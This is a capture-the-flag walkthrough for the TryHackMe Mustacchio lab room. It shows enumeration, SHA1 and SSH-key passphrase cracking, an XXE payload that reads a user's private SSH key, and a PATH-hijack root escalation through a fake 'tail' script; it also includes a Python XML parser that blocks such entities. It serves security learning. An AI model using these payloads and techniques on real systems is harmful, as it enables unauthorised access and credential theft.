THM Mustacchio Walkthrough

TryHackMe is a popular service that offers CTF- and walkthrough-style rooms to help people interested in infosec gain new knowledge. The TryHackMe Mustacchio room is a rather easy CTF that covers local file reads through XML external entities (XXE), hash cracking and a simple privilege escalation by manipulating the PATH variable.
THM Room: here

Information Gathering

As usual, let's begin with an nmap scan to gain information about the THM Mustacchio machine:

sudo nmap -p 1-10000 -sV -v 10.10.62.15

This reveals three open ports.

Next, I used gobuster to enumerate the web server on port 80:

gobuster dir -u http://10.10.62.15/ -w ~/Lists/gobuster/Gobuster-Dir-Medium.txt -t 50

Gobuster found a directory called custom which contains a folder called "js" and one called "css".

CSS is probably not interesting for us so let's start with the js folder.

Inside that folder we find a file called users.bak that we can download. Running file users.bak shows the file type: a SQLite 3.x database.

Now we can either simply dump the printable text with strings users.bak, or use a database browser such as sqlitebrowser, which can be installed via apt-get.

Either way you will get the same result (a DB browser probably looks prettier, but that doesn't matter here).

For this THM Mustacchio walkthrough I used strings, which makes it easier to show the result here:

$ strings users.bak
SQLite format 3
tableusersusers
CREATE TABLE users(username text NOT NULL, password text NOT NULL)
]admin1868e36a6d2b17d4c2745f1659433a54d4bc5f4b

Gaining access

Using hashcat we can crack that hash (it is a SHA1 hash, hashcat mode 100):

hashcat -m 100 hashfile ~/Lists/Wordlists/rockyou.txt

To display the plaintext password afterwards, rerun the same command with --show appended (or use: !! --show).

Unfortunately, the credentials cannot be used to log into an SSH session, but we have another web service to enumerate (remember port 8765).

The web service on port 8765 presents a login form for an admin panel, and the cracked credentials work there.

Taking a look at the source code of the panel, we find the following comment:

<!-- Barry, you can now SSH in using your key!-->

Also, the textbox appears to accept XML input, as the name of the textarea is "xml".

Ok, so the default location for a user's SSH key is /home/user/.ssh/id_rsa. Let's try to read that file through an external entity (the "LFI" part of this room) with the following payload:

<?xml version="1.0"?>
  <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY nop SYSTEM "file:///home/barry/.ssh/id_rsa" >
  ]>
  <feed>
    <name>&nop;</name>
    <Subject>nop</Subject>
    <Content>nop</Content>
  </feed>

This reads the file and displays its contents in the name paragraph; if the file did not exist or were not readable, nothing would be displayed, but here it succeeds.
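As an added defender-side example (not code from the original walkthrough or the room), here is how the panel's feed XML could be parsed so that a DOCTYPE or entity declaration is refused before the parser can act on it, using only Python's standard-library expat. The element names come from the payload above; the benign sample input is constructed, and the page's payload is reused purely as a test input.

```python
from xml.parsers import expat

# Constructed sample in the same shape as the panel's textarea input.
BENIGN_FEED = ('<?xml version="1.0"?><feed><name>Alice</name>'
               '<Subject>Hi</Subject><Content>Hello</Content></feed>')
# The walkthrough's external-entity payload, reused here only as a test input.
XXE_FEED = ('<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
            '<!ENTITY nop SYSTEM "file:///home/barry/.ssh/id_rsa">]>'
            '<feed><name>&nop;</name><Subject>nop</Subject>'
            '<Content>nop</Content></feed>')


class UnsafeXML(ValueError):
    """Raised when a document tries to declare a DTD or an entity."""


def parse_feed(xml_text):
    """Return the feed's name/Subject/Content; raise UnsafeXML on DTD use."""
    stack, text = [], {}

    def reject(*_args):
        # Fires on "<!DOCTYPE" or "<!ENTITY" before expat can act on them, so
        # a file:///... entity is never even declared (the defusedxml approach).
        raise UnsafeXML("DTD and entity declarations are not accepted")

    def start(name, _attrs):
        stack.append(name)
        text.setdefault(name, [])

    def chars(data):
        if stack:
            text[stack[-1]].append(data)

    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = reject
    p.EntityDeclHandler = reject
    # Defence in depth: returning 0 makes expat abort with ExpatError on any
    # external entity reference instead of fetching it.
    p.ExternalEntityRefHandler = lambda *_a: 0
    p.StartElementHandler = start
    p.CharacterDataHandler = chars
    p.EndElementHandler = lambda _name: stack.pop()
    p.Parse(xml_text, True)
    return {k: "".join(text.get(k, [])) for k in ("name", "Subject", "Content")}


def is_xxe_attempt(xml_text):
    # Detection helper for logging or alerting: True if the input was rejected.
    try:
        parse_feed(xml_text)
    except UnsafeXML:
        return True
    return False
```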

Gaining access via SSH

If you try to start an SSH session using the key with ssh barry@10.10.62.15 -i id_rsa, you will be prompted with the following:

Enter passphrase for key 'id_rsa':

which means we have to crack the passphrase first, as the key file is encrypted.

Luckily, John the Ripper together with its toolset is perfect for that scenario.

Using ssh2john we can convert the key file into a hash that john itself can then brute-force:

python ssh2john.py id_rsa > id_john

Now we can brute-force the passphrase from the converted hash file with: john --wordlist=~/Lists/Wordlists/rockyou.txt --format=SSH id_john

Finally, you are able to log in via SSH and obtain the first flag.

Privilege escalation

After navigating into the home directory of joe, you can see an ELF file owned by root that has the SUID bit set and is executable by everyone.

When executed, the file simply shows us the nginx access.log file and does not take any user input.

I extracted printable text with strings live_log and found the command that is executed to display the log file: tail -f /var/log/nginx/access.log.

This is a very easy privilege escalation: because tail is invoked by name rather than by an absolute path, the binary resolves it through the PATH variable, so we just have to modify PATH so that "our tail" executable is found before the original one.

First I created a file called "tail" in my home directory with the following content:

#!/usr/bin/python3
# Spawns an interactive bash shell in a pseudo-terminal; the file must be
# made executable (chmod +x tail) so it can be found and run via PATH.
import pty

pty.spawn('/bin/bash')

Next I modified the PATH variable using export PATH=$PWD:$PATH, which puts my working directory (my home directory) in front of the original PATH string.

As a result, my tail executable is run when live_log is executed.

Eventually, you get a root shell and through that the system flag.

I hope you liked this TryHackMe Mustacchio walkthrough; as always, if you have any questions feel free to reach out to me.

